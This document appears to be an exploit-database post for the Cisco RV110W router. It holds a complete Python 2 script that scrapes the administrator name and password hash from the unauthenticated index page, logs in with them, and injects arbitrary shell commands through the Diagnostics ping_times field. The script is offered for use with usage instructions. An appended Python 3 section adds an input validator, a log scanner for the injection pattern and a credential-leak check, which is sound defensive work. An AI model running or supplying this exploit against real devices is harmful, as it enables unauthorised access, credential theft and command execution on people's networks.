[EXP]Cisco RV110W - Password Disclosure / Command Execution
```python
#!/usr/bin/env python2
#####
## Cisco RV110W Password Disclosure and OS Command Execute.
### Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)
# Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute
# Date: 2018-08
# Exploit Author: RySh
# Vendor Homepage: https://www.cisco.com/
# Version: 1.1.0.9
# Tested on: RV110W 1.1.0.9
# CVE : CVE-2014-0683, CVE-2015-6396

import os
import sys
import re
import urllib
import urllib2
import getopt
import json
import ssl

# The router serves a self-signed certificate, so TLS verification is disabled.
ssl._create_default_https_context = ssl._create_unverified_context

###
# Usage: ./{script_name} 192.168.1.1 443 "reboot"
###
if __name__ == "__main__":
    IP = sys.argv[1]
    PORT = sys.argv[2]
    CMD = sys.argv[3]

    # Get session key, Just access index page.
    url = 'https://' + IP + ':' + PORT + '/'
    req = urllib2.Request(url)
    result = urllib2.urlopen(req)
    res = result.read()

    # parse 'admin_pwd'! -- Get creds
    admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
    admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
    print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd

    # Get session_id by POST
    req2 = urllib2.Request(url + "login.cgi")
    req2.add_header('Origin', url)
    req2.add_header('Upgrade-Insecure-Requests', 1)
    req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
    req2.add_header('User-Agent',
                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
    req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
    req2.add_header('Referer', url)
    req2.add_header('Accept-Encoding', 'gzip, deflate')
    req2.add_header('Accept-Language', 'en-US,en;q=0.9')
    req2.add_header('Cookie', 'SessionID=')
    data = {"submit_button": "login",
            "submit_type": "",
            "gui_action": "",
            "wait_time": "",
            "change_action": "",
            "enc": "",
            "user": admin_user,
            "pwd": admin_pwd,
            "sel_lang": "EN"
            }
    r = urllib2.urlopen(req2, urllib.urlencode(data))
    resp = r.read()
    login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
    session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]

    # Execute your commands via diagnose command parameter, default command is `reboot`
    req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
    req3.add_header('Origin', url)
    req3.add_header('Upgrade-Insecure-Requests', 1)
    req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
    req3.add_header('User-Agent',
                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
    req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
    req3.add_header('Referer', url)
    req3.add_header('Accept-Encoding', 'gzip, deflate')
    req3.add_header('Accept-Language', 'en-US,en;q=0.9')
    req3.add_header('Cookie', 'SessionID=')
    data_cmd = {"submit_button": "Diagnostics",
                "change_action": "gozila_cgi",
                "submit_type": "start_ping",
                "gui_action": "",
                "traceroute_ip": "",
                "commit": "",
                "ping_times": "3 |" + CMD + "|",
                "ping_size": "",
                "wait_time": "",
                "ping_ip": "127.0.0.1",
                "lookup_name": ""
                }
    r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))
```
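The script above abuses two weaknesses: the unauthenticated index page embeds `admin_name` and `admin_pwd`, and the Diagnostics form's `ping_times` field is passed to a shell without validation. The following Python 3 code is an added defensive example, not part of the original exploit or of Cisco's firmware. It shows (1) the input policy a ping form needs so that the `3 |cmd|` pattern is rejected, (2) a scan over request logs that flags Diagnostics submissions violating that policy, and (3) a check that an unauthenticated page body no longer embeds the credential fields the exploit parses. The log line format and the sample lines are constructed for the example; the field names come from the request the script sends, and the allowed shapes (small integers, an IP address) are an assumption about what the form legitimately needs.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Characters that let a form value escape the ping command line the firmware
# builds; the page's payload relies on '|'.
SHELL_META = re.compile(r'[|;&`$(){}<>\n\r]')

# Credential fields the exploit parses out of the unauthenticated index page.
LEAK = re.compile(r'admin_(name|pwd)="[^"]*"')


def validate_diag_params(params):
    """Check the Diagnostics form fields (name -> decoded value).

    Returns a list of violation strings; an empty list means the request is
    well-formed. Numeric fields must be short integers, ping_ip must parse as
    an IP address, and no field may contain shell metacharacters.
    """
    violations = []
    for field in ("ping_times", "ping_size"):
        value = params.get(field, "")
        if value and not re.fullmatch(r"\d{1,4}", value):
            violations.append("%s is not a small integer: %r" % (field, value))
    ping_ip = params.get("ping_ip", "")
    if ping_ip:
        try:
            ipaddress.ip_address(ping_ip)
        except ValueError:
            violations.append("ping_ip is not an IP address: %r" % ping_ip)
    for field, value in params.items():
        if SHELL_META.search(value):
            violations.append("%s contains shell metacharacters: %r" % (field, value))
    return violations


# Constructed log format (assumption): '<timestamp> <client> "POST <path>" <body>'
LOG_LINE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) "POST (?P<path>\S+)" (?P<body>.*)$')


def scan_request_log(lines):
    """Return one finding per Diagnostics (start_ping) request whose fields
    violate the policy above. Other paths and submit types are ignored."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or not m.group("path").startswith("/apply.cgi"):
            continue
        params = {k: v[0] for k, v in
                  parse_qs(m.group("body"), keep_blank_values=True).items()}
        if params.get("submit_type") != "start_ping":
            continue
        violations = validate_diag_params(params)
        if violations:
            findings.append({"ts": m.group("ts"), "src": m.group("src"),
                             "violations": violations})
    return findings


def page_leaks_credentials(html):
    """True if a page body embeds admin_name/admin_pwd the way the exploit
    expects; run against a fetch made without a session to confirm a fix."""
    return bool(LEAK.search(html))


# Constructed sample lines: a normal ping, the page's injection pattern
# ('3 |reboot|' URL-encoded), and an unrelated login request.
SAMPLE_LOG = [
    '2018-08-01T10:00:00Z 192.168.1.50 "POST /apply.cgi;session_id=CONSTRUCTED" '
    'submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping'
    '&ping_times=3&ping_size=56&ping_ip=8.8.8.8',
    '2018-08-01T10:00:05Z 192.168.1.77 "POST /apply.cgi;session_id=CONSTRUCTED" '
    'submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping'
    '&ping_times=3+%7Creboot%7C&ping_size=&ping_ip=127.0.0.1',
    '2018-08-01T10:00:09Z 192.168.1.50 "POST /login.cgi" '
    'submit_button=login&user=admin&pwd=REDACTED',
]

if __name__ == "__main__":
    for finding in scan_request_log(SAMPLE_LOG):
        print(finding["ts"], finding["src"], "; ".join(finding["violations"]))
```

The scan keys on `submit_type=start_ping` and the `apply.cgi` path because that is the combination the exploit sends; a benign ping with integer counts and a real IP produces no finding, while the `3 |reboot|` value trips both the integer rule and the metacharacter rule.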